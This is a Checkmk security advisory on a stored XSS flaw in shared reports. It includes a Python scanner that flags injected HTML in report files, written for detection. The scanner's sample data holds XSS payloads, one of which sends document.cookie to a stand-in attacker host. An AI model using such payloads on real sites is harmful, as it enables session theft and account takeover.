Werk #13193: XSS in report editing

Component Reporting & Availability
Title XSS in report editing
Date 24.09.2021
Checkmk Edition Checkmk Enterprise (CEE)
Checkmk Version 2.1.0i1, 2.0.0p12, 1.6.0p26
Level Trivial change
Class Security fix
Compatibility Compatible - no manual intervention needed

It was possible to inject HTML code into various content elements of a report. Because reports can be shared, such injected code could also reach other users through shared reports (stored XSS).

CVSS CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H 9.0
Affected Versions all versions below the fixed versions listed above
Workaround Disallow users to customize reports (set 'General Permissions' > 'Customize reports and use them' to "no").
Exploit detection Check `var/check_mk/web/*/user_reports.mk` for HTML special characters (`<`, `>`, `&`) inside report titles and content elements.
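The following scanner automates the exploit-detection check above. It is an added example, not Checkmk's own code: it reads each `user_reports.mk` file as plain text (these files are assumed to be Python literal dumps, so single and double quotes appear everywhere and are deliberately not treated as indicators) and flags lines containing `<`, `>` or `&`, rating a line "high" when it contains something shaped like an HTML tag or entity and "low" otherwise (an `&` in a URL query string is a common benign case). The site path and the sample file contents are constructed for the example.

```python
import glob
import re
from pathlib import Path

# Raw characters that a correctly escaped report definition should not need
# in user-controlled text. Quotes are left out on purpose: the .mk file is a
# Python literal dump and every string value is quoted.
HTML_SPECIAL = re.compile(r"[<>&]")

# Something that looks like a tag (<b>, <img src=x onerror=...>, </script>)
# or an HTML entity (&lt; &#60;): strongest signal of an injection attempt.
TAG_OR_ENTITY = re.compile(r"<\s*/?\s*[A-Za-z][^<>]*>|&#?\w+;")


def scan_text(text, source="<memory>"):
    """Return a list of findings for one user_reports.mk body.

    Each finding: {"source", "line", "severity", "snippet"}.
    severity is "high" for tag/entity-like content, "low" for a bare <, > or &.
    """
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not HTML_SPECIAL.search(line):
            continue
        severity = "high" if TAG_OR_ENTITY.search(line) else "low"
        findings.append({
            "source": source,
            "line": lineno,
            "severity": severity,
            "snippet": line.strip()[:120],
        })
    return findings


def scan_files(pattern):
    """Scan every file matching the glob pattern; returns all findings."""
    findings = []
    for path in sorted(glob.glob(pattern)):
        text = Path(path).read_text(encoding="utf-8", errors="replace")
        findings.extend(scan_text(text, source=path))
    return findings


# Constructed sample, pretty-printed across lines so line numbers are useful.
# Real files are normally a single repr() line; the scan still works on those,
# you just get one finding per file instead of per line.
SAMPLE_USER_REPORTS = """\
{'monthly': {'title': 'Monthly availability', 'elements': [('text', {'text': 'Uptime report for March'})]},
 'evil': {'title': 'Report <img src=x onerror=alert(1)>', 'elements': [('text', {'text': 'see <script>fetch("//attacker.example/"+document.cookie)</script>'})]},
 'links': {'title': 'Links', 'elements': [('text', {'text': 'https://monitoring.example/?a=1&b=2'})]}}
"""


if __name__ == "__main__":
    # Hypothetical site path; adjust OMD_ROOT to your site.
    OMD_ROOT = "/omd/sites/mysite"
    results = scan_files(f"{OMD_ROOT}/var/check_mk/web/*/user_reports.mk")
    if not results:
        results = scan_text(SAMPLE_USER_REPORTS, source="constructed-sample")
    for f in results:
        print(f"{f['severity']:<4} {f['source']}:{f['line']}: {f['snippet']}")
```

Treat every "high" hit as a likely exploitation attempt and identify the owning user from the directory name under `var/check_mk/web/`; "low" hits usually turn out to be URLs or plain ampersands and can be reviewed by hand.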
